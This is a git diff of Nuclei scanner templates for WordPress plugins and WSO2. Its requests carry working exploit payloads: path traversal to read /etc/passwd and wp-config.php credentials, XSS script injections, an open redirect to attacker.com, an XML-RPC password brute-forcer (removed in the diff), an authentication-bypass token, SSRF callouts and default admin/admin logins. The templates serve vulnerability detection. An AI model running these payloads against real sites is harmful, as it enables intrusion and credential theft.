4a0a0047304502210095023b56d6b5f8de96d1dea251a65281724b07248b2ee51345773ddb460cc3850220369474107f2fcc1da0b33794286d4f7c77f20fc9350a684b3b5f6484bafe55e6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/wp-security-open-redirect.yaml b/nuclei-templates/Other/wp-security-open-redirect.yaml new file mode 100644 index 0000000000..7b3889e913 --- /dev/null +++ b/nuclei-templates/Other/wp-security-open-redirect.yaml @@ -0,0 +1,21 @@ +id: wp-security-open-redirect +info: + name: All In One WP Security & Firewall <= 4.4.1 - Open Redirect & Hidden Login Page Exposure + author: akincibor + severity: low + description: | + The All In One WP Security & Firewall plugin suffers from open redirect and exposure of the actual URL of the "hidden login page" feature. + reference: + - https://wpscan.com/vulnerability/9898 + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp +requests: + - method: GET + path: + - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://attacker.com" + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/Other/wp-sendgrid-mailer.yaml b/nuclei-templates/Other/wp-sendgrid-mailer.yaml new file mode 100644 index 0000000000..f99e81b9bc --- /dev/null +++ b/nuclei-templates/Other/wp-sendgrid-mailer.yaml @@ -0,0 +1,59 @@ +id: wp-sendgrid-mailer + +info: + name: > + SendGrid for WordPress <= 1.4 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdb3c672-0ac4-42e8-951b-e41dc8bd6231?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-sendgrid-mailer/" + google-query: inurl:"/wp-content/plugins/wp-sendgrid-mailer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-sendgrid-mailer,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-sendgrid-mailer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-sendgrid-mailer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file diff --git a/nuclei-templates/Other/wp-sfwd-lms-listing-11562.yaml b/nuclei-templates/Other/wp-sfwd-lms-listing-11562.yaml index 62267327ee..adbac15377 100644 --- a/nuclei-templates/Other/wp-sfwd-lms-listing-11562.yaml +++ b/nuclei-templates/Other/wp-sfwd-lms-listing-11562.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6426 + reference: https://www.exploit-db.com/ghdb/6426 tags: wordpress,listing,plugin requests: - method: GET diff --git a/nuclei-templates/Other/wp-simple-fields-lfi-11568.yaml b/nuclei-templates/Other/wp-simple-fields-lfi-11568.yaml deleted file mode 100644 index e26d5566c9..0000000000 --- a/nuclei-templates/Other/wp-simple-fields-lfi-11568.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-simple-fields-lfi - -info: - name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE - author: 0x240x23elu - severity: high - reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file diff --git a/nuclei-templates/Other/wp-simple-fields-lfi-11571.yaml b/nuclei-templates/Other/wp-simple-fields-lfi-11571.yaml new file mode 100644 index 0000000000..e55a9a7d30 --- /dev/null +++ b/nuclei-templates/Other/wp-simple-fields-lfi-11571.yaml @@ -0,0 +1,16 @@ +id: wp-simple-fields-lfi +info: + name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE + author: 0x240x23elu + severity: high + reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body diff --git a/nuclei-templates/Other/wp-slideshow-xss-11572.yaml b/nuclei-templates/Other/wp-slideshow-xss-11572.yaml deleted file mode 100644 index 2b851c9f5b..0000000000 --- a/nuclei-templates/Other/wp-slideshow-xss-11572.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wp-slideshow-xss -info: - name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - https://www.exploit-db.com/exploits/37948 - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-slideshow-xss-11574.yaml b/nuclei-templates/Other/wp-slideshow-xss-11574.yaml new file mode 100644 index 0000000000..8b753d553f --- /dev/null +++ b/nuclei-templates/Other/wp-slideshow-xss-11574.yaml @@ -0,0 +1,28 @@ +id: wp-slideshow-xss +info: + name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/37948 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-socialfit-xss-11577.yaml b/nuclei-templates/Other/wp-socialfit-xss-11577.yaml new file mode 100644 index 0000000000..56b6690c8f --- /dev/null +++ b/nuclei-templates/Other/wp-socialfit-xss-11577.yaml @@ -0,0 +1,29 @@ +id: wp-socialfit-xss + +info: + name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting + author: daffainfo + severity: medium + description: | + SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + reference: + - https://www.exploit-db.com/exploits/37481 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-socialfit-xss-11581.yaml b/nuclei-templates/Other/wp-socialfit-xss-11581.yaml deleted file mode 100644 index 91ea8abca5..0000000000 --- a/nuclei-templates/Other/wp-socialfit-xss-11581.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: wp-socialfit-xss - -info: - name: WordPress SocialFit - Cross-Site Scripting - author: daffainfo - severity: medium - description: | - WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input. - reference: - - https://www.exploit-db.com/exploits/37481 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - tags: wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/29 diff --git a/nuclei-templates/Other/wp-spot-premium-lfi-11583.yaml b/nuclei-templates/Other/wp-spot-premium-lfi-11583.yaml index 837c0a1649..58296bad64 100644 --- a/nuclei-templates/Other/wp-spot-premium-lfi-11583.yaml +++ b/nuclei-templates/Other/wp-spot-premium-lfi-11583.yaml @@ -1,5 +1,4 @@ id: wp-spot-premium-lfi - info: name: WordPress Javo Spot Premium Theme - Unauthenticated Directory Traversal author: dhiyaneshDk @@ -8,15 +7,11 @@ info: reference: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - metadata: - max-request: 1 - tags: wordpress,backup,wpscan - -http: + tags: wordpress,backup +requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' - matchers-condition: and matchers: - type: word @@ -25,9 +20,8 @@ http: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100874560c9cb4fc49764c0a25869b2e76a00313f549e2f8eed50ddf6314bc77b9b02210091b73a611ad57208cf01d6191a7ddaa119354f1d5f2799e189d367765c745ec1:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/Other/wp-tinymce-lfi-11589.yaml b/nuclei-templates/Other/wp-tinymce-lfi.yaml similarity index 100% rename from nuclei-templates/Other/wp-tinymce-lfi-11589.yaml rename to nuclei-templates/Other/wp-tinymce-lfi.yaml diff --git a/nuclei-templates/Other/wp-tutor-lfi-11598.yaml b/nuclei-templates/Other/wp-tutor-lfi-11598.yaml new file mode 100644 index 0000000000..02a965a0f1 --- /dev/null +++ b/nuclei-templates/Other/wp-tutor-lfi-11598.yaml @@ -0,0 +1,16 @@ +id: wp-tutor-lfi +info: + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion + author: 0x240x23elu + severity: high + reference: https://www.exploit-db.com/exploits/48058 + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body diff --git a/nuclei-templates/Other/wp-tutor-lfi-11599.yaml b/nuclei-templates/Other/wp-tutor-lfi-11599.yaml deleted file mode 100644 index 9214a5fa94..0000000000 --- a/nuclei-templates/Other/wp-tutor-lfi-11599.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-tutor-lfi - -info: - name: WordPress Plugin tutor.1.5.3 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/48058 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file diff --git a/nuclei-templates/Other/wp-upload-data.yaml b/nuclei-templates/Other/wp-upload-data.yaml deleted file mode 100644 index ad366b15a7..0000000000 --- a/nuclei-templates/Other/wp-upload-data.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wordpress-upload-data - -info: - name: wordpress-upload-data - author: pussycat0x - severity: medium - description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. - reference: https://www.exploit-db.com/ghdb/7040 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/data.txt" - - matchers-condition: and - matchers: - - type: word - words: - - "admin:" - - - type: word - part: header - words: - - "text/plain" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-vault-lfi-11608.yaml b/nuclei-templates/Other/wp-vault-lfi-11608.yaml new file mode 100644 index 0000000000..72412de34d --- /dev/null +++ b/nuclei-templates/Other/wp-vault-lfi-11608.yaml @@ -0,0 +1,24 @@ +id: wp-vault-local-file-inclusion + +info: + name: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion + author: imhunterand + severity: high + reference: https://www.exploit-db.com/exploits/40850 + tags: wp,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-vault-lfi.yaml b/nuclei-templates/Other/wp-vault-lfi.yaml deleted file mode 100644 index 8aa3141888..0000000000 --- a/nuclei-templates/Other/wp-vault-lfi.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: wp-vault-local-file-inclusion - -info: - name: WordPress Vault 0.8.6.6 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/40850 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wp-plugin,wordpress,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/29 diff --git a/nuclei-templates/Other/wp-whmcs-xss.yaml b/nuclei-templates/Other/wp-whmcs-xss-11614.yaml similarity index 100% rename from nuclei-templates/Other/wp-whmcs-xss.yaml rename to nuclei-templates/Other/wp-whmcs-xss-11614.yaml diff --git a/nuclei-templates/Other/wp-woocommerce-email-verification-11619.yaml b/nuclei-templates/Other/wp-woocommerce-email-verification-11619.yaml new file mode 100644 index 0000000000..322d266885 --- /dev/null +++ b/nuclei-templates/Other/wp-woocommerce-email-verification-11619.yaml @@ -0,0 +1,25 @@ +id: wp-woocommerce-email-verification +info: + name: wordpress-emails-verification-for-woocommerce + author: random-robbie + severity: critical + tags: wordpress,wp-plugin + # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + # https://wpvulndb.com/vulnerabilities/10318 + # GDPR plugin may give a false positive so double check headers +requests: + - method: GET + path: + - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + matchers-condition: and + matchers: + - type: word + words: + - "wordpress_logged_in" + part: header + - type: status + status: + - 401 + - 403 + negative: true diff --git a/nuclei-templates/Other/wp-woocommerce-file-download-11620.yaml b/nuclei-templates/Other/wp-woocommerce-file-download-11620.yaml deleted file mode 100644 index 13aeedf332..0000000000 --- a/nuclei-templates/Other/wp-woocommerce-file-download-11620.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wp-woocommerce-file-download - -info: - name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download - author: 0x_Akoko - severity: high - tags: wordpress,woocommerce,lfi - description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. - reference: - - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 - - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-woocommerce-file-download.yaml b/nuclei-templates/Other/wp-woocommerce-file-download.yaml new file mode 100644 index 0000000000..d49796a7a3 --- /dev/null +++ b/nuclei-templates/Other/wp-woocommerce-file-download.yaml @@ -0,0 +1,25 @@ +id: wp-woocommerce-file-download +info: + name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download + author: 0x_Akoko + severity: high + tags: wordpress,woocommerce,lfi + description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. + reference: + - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 + - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-xmlrpc-11629.yaml b/nuclei-templates/Other/wp-xmlrpc-11629.yaml index 850ea25a51..4c8bb355ee 100644 --- a/nuclei-templates/Other/wp-xmlrpc-11629.yaml +++ b/nuclei-templates/Other/wp-xmlrpc-11629.yaml @@ -1,9 +1,11 @@ id: wordpress-xmlrpc-file + info: name: WordPress xmlrpc author: udit_thakkur severity: info tags: wordpress + requests: - method: GET path: diff --git a/nuclei-templates/Other/wp-xmlrpc-brute-force.yaml b/nuclei-templates/Other/wp-xmlrpc-brute-force.yaml deleted file mode 100644 index ee80efb91c..0000000000 --- a/nuclei-templates/Other/wp-xmlrpc-brute-force.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: wordpress-xmlrpc-brute-force - -info: - name: Wordpress XMLRPC.php username and password Bruteforcer - author: Exid - severity: high - description: Ths template bruteforces username and passwords through xmlrpc.php being available. - reference: - - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ - tags: wordpress,php,xmlrpc,fuzz - -requests: - - raw: - - | - POST /xmlrpc.php HTTP/1.1 - Host: {{Hostname}} - Content-Length: 235 - - - - wp.getUsersBlogs - - - {{username}} - - - {{password}} - - - - - attack: clusterbomb - payloads: - username: helpers/wordlists/wp-users.txt - password: helpers/wordlists/wp-passwords.txt - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - 'url' - - 'xmlrpc' - - 'isAdmin' - condition: and diff --git a/nuclei-templates/Other/wp-xmlrpc-detect.yaml b/nuclei-templates/Other/wp-xmlrpc-detect.yaml new file mode 100644 index 0000000000..163e4fd44a --- /dev/null +++ b/nuclei-templates/Other/wp-xmlrpc-detect.yaml @@ -0,0 +1,16 @@ +id: wp-xmlrpc-detect + +info: + name: Wordpress xmlrpc detect + author: dat-ayush + severity: medium + description: Detects open xmlrpc server on a Wordpress site + +http: + - method: POST + path: + - "{{BaseURL}}/xmlrpc.php" + matchers: + - type: regex + regex: + - "[(?i)]" diff --git a/nuclei-templates/Other/wp-xmlrpc-pingback-detection-11628.yaml b/nuclei-templates/Other/wp-xmlrpc-pingback-detection-11628.yaml new file mode 100644 index 0000000000..311df4d1fd --- /dev/null +++ b/nuclei-templates/Other/wp-xmlrpc-pingback-detection-11628.yaml @@ -0,0 +1,38 @@ +id: wp-xmlrpc-pingback-detection + +info: + name: Wordpress XMLRPC Pingback detection + author: pdteam + severity: info + tags: wordpress,ssrf,oast,xmlrpc + reference: + - https://github.com/dorkerdevil/rpckiller + - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 + +requests: + - raw: + - | + POST /xmlrpc.php HTTP/1.1 + Host: {{Hostname}} + + + pingback.ping + + + + http://{{interactsh-url}} + + + + + {{BaseURL}}/?p=1 + + + + + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/nuclei-templates/Other/wp-xmlrpc-pingback-detection.yaml b/nuclei-templates/Other/wp-xmlrpc-pingback-detection.yaml deleted file mode 100644 index 80cc4c17c9..0000000000 --- a/nuclei-templates/Other/wp-xmlrpc-pingback-detection.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: wp-xmlrpc-pingback-detection -info: - name: Wordpress XMLRPC Pingback detection - author: pdteam - severity: info - tags: wordpress,ssrf,oast,xmlrpc - reference: - - https://github.com/dorkerdevil/rpckiller - - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 -requests: - - raw: - - | - POST /xmlrpc.php HTTP/1.1 - Host: {{Hostname}} - - - pingback.ping - - - - http://{{interactsh-url}} - - - - - {{BaseURL}}/?p=1 - - - - - matchers: - - type: word - part: interactsh_protocol - words: - - "http" diff --git a/nuclei-templates/Other/wpmudev-my-calender-xss.yaml b/nuclei-templates/Other/wpmudev-my-calender-xss-11502.yaml similarity index 100% rename from nuclei-templates/Other/wpmudev-my-calender-xss.yaml rename to nuclei-templates/Other/wpmudev-my-calender-xss-11502.yaml diff --git a/nuclei-templates/Other/wpmudev-pub-keys-11507.yaml b/nuclei-templates/Other/wpmudev-pub-keys-11507.yaml index d40ad9c213..457332619f 100644 --- a/nuclei-templates/Other/wpmudev-pub-keys-11507.yaml +++ b/nuclei-templates/Other/wpmudev-pub-keys-11507.yaml @@ -1,12 +1,10 @@ id: wpmudev-pub-keys - info: name: Wpmudev Dashboard Pub Key author: dhiyaneshDk severity: medium reference: https://www.exploit-db.com/ghdb/6443 tags: wordpress - requests: - method: GET path: @@ -19,7 +17,6 @@ requests: - ".pub" - "wpmudev" condition: and - part: body - type: status status: diff --git a/nuclei-templates/Other/wptouch-open-redirect-11592.yaml b/nuclei-templates/Other/wptouch-open-redirect-11592.yaml index d999043d40..2468d968b4 100644 --- a/nuclei-templates/Other/wptouch-open-redirect-11592.yaml +++ b/nuclei-templates/Other/wptouch-open-redirect-11592.yaml @@ -1,5 +1,4 @@ id: wptouch-open-redirect - info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko @@ -12,14 +11,13 @@ info: Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. - reference: https://cxsecurity.com/issue/WLB-2020030114 + reference: + - https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress - requests: - method: GET path: - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" - matchers: - type: regex regex: diff --git a/nuclei-templates/Other/wptouch-plugin-open-redirect.yaml b/nuclei-templates/Other/wptouch-plugin-open-redirect.yaml deleted file mode 100644 index e26d6d42a2..0000000000 --- a/nuclei-templates/Other/wptouch-plugin-open-redirect.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wptouch-plugin-open-redirect - -info: - name: Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko - reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - severity: low - tags: wp,redirect,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/Other/writebook-detect.yaml b/nuclei-templates/Other/writebook-detect.yaml new file mode 100644 index 0000000000..34199ec4fd --- /dev/null +++ b/nuclei-templates/Other/writebook-detect.yaml @@ -0,0 +1,36 @@ +id: writebook-detect + +info: + name: Writebook - Detect + author: hahwul + severity: info + reference: + - https://once.com/writebook + - https://books.37signals.com/2/the-writebook-manual + metadata: + max-request: 1 + verified: true + shodan-query: html:"Writebook" + tags: writebook,tech + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/session/new" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - "Set-Cookie: _writebook_session" + + - type: word + part: body + words: + - "Made with Writebook" + - "Writebook

    " + condition: or +# digest: 4b0a00483046022100f4900f637f0c9f92829ae263db7bd5a0cc5b360e61fe1134b0ca173028375a9d022100ed88166190f0c7c5727d7f28c11f8036735b332f80009f492ed4a6accd072a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/wso2-2019-0598-11635.yaml b/nuclei-templates/Other/wso2-2019-0598-11635.yaml new file mode 100644 index 0000000000..0acae179fe --- /dev/null +++ b/nuclei-templates/Other/wso2-2019-0598-11635.yaml @@ -0,0 +1,36 @@ +id: WSO2-2019-0598 + +info: + name: WSO2 <5.8.0 - Server Side Request Forgery + author: Amnotacat + severity: medium + description: | + WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. + remediation: | + Upgrade the product version to 5.8.0 or higher. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cwe-id: CWE-918 + metadata: + max-request: 1 + tags: ssrf,wso2,shindig + +http: + - method: GET + path: + - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro" + + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100c9d304b7771a2bb8d354f82c1bdd20dc71896400353658be7c17738f42e5ccec022036b6b905f824bf4d143ea15fe903d829bdca87c70142be501357f48e82d852cf:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/wso2-apimanager-detect-11638.yaml b/nuclei-templates/Other/wso2-apimanager-detect-11638.yaml new file mode 100644 index 0000000000..3008bde941 --- /dev/null +++ b/nuclei-templates/Other/wso2-apimanager-detect-11638.yaml @@ -0,0 +1,23 @@ +id: wso2-apimanager-detect + +info: + name: WSO2 API Manager detect + author: righettod + severity: info + description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint + tags: tech,wso2,api-manager + +requests: + - method: GET + path: + - "{{BaseURL}}/services/Version" + + matchers-condition: and + matchers: + - type: word + words: + - "version.services.core.carbon.wso2.org" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wso2-apimanager-detect-11639.yaml b/nuclei-templates/Other/wso2-apimanager-detect-11639.yaml deleted file mode 100644 index 042ae34b83..0000000000 --- a/nuclei-templates/Other/wso2-apimanager-detect-11639.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wso2-apimanager-detect -info: - name: WSO2 API Manager detect - author: righettod - severity: info - description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint - tags: tech,wso2,api-manager -requests: - - method: GET - path: - - "{{BaseURL}}/services/Version" - matchers-condition: and - matchers: - - type: word - words: - - "version.services.core.carbon.wso2.org" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wso2-default-login-11641.yaml b/nuclei-templates/Other/wso2-default-login-11641.yaml deleted file mode 100644 index 9e3fd49b53..0000000000 --- a/nuclei-templates/Other/wso2-default-login-11641.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: wso2-default-login - -info: - name: WSO2 Management Console Default Login - author: cocxanh - severity: high - reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console - tags: default-login,wso2 - -requests: - - raw: - - | - POST /carbon/admin/login_action.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - redirects: false - matchers: - - type: word - words: - - "/carbon/admin/index.jsp?loginStatus=true" - - 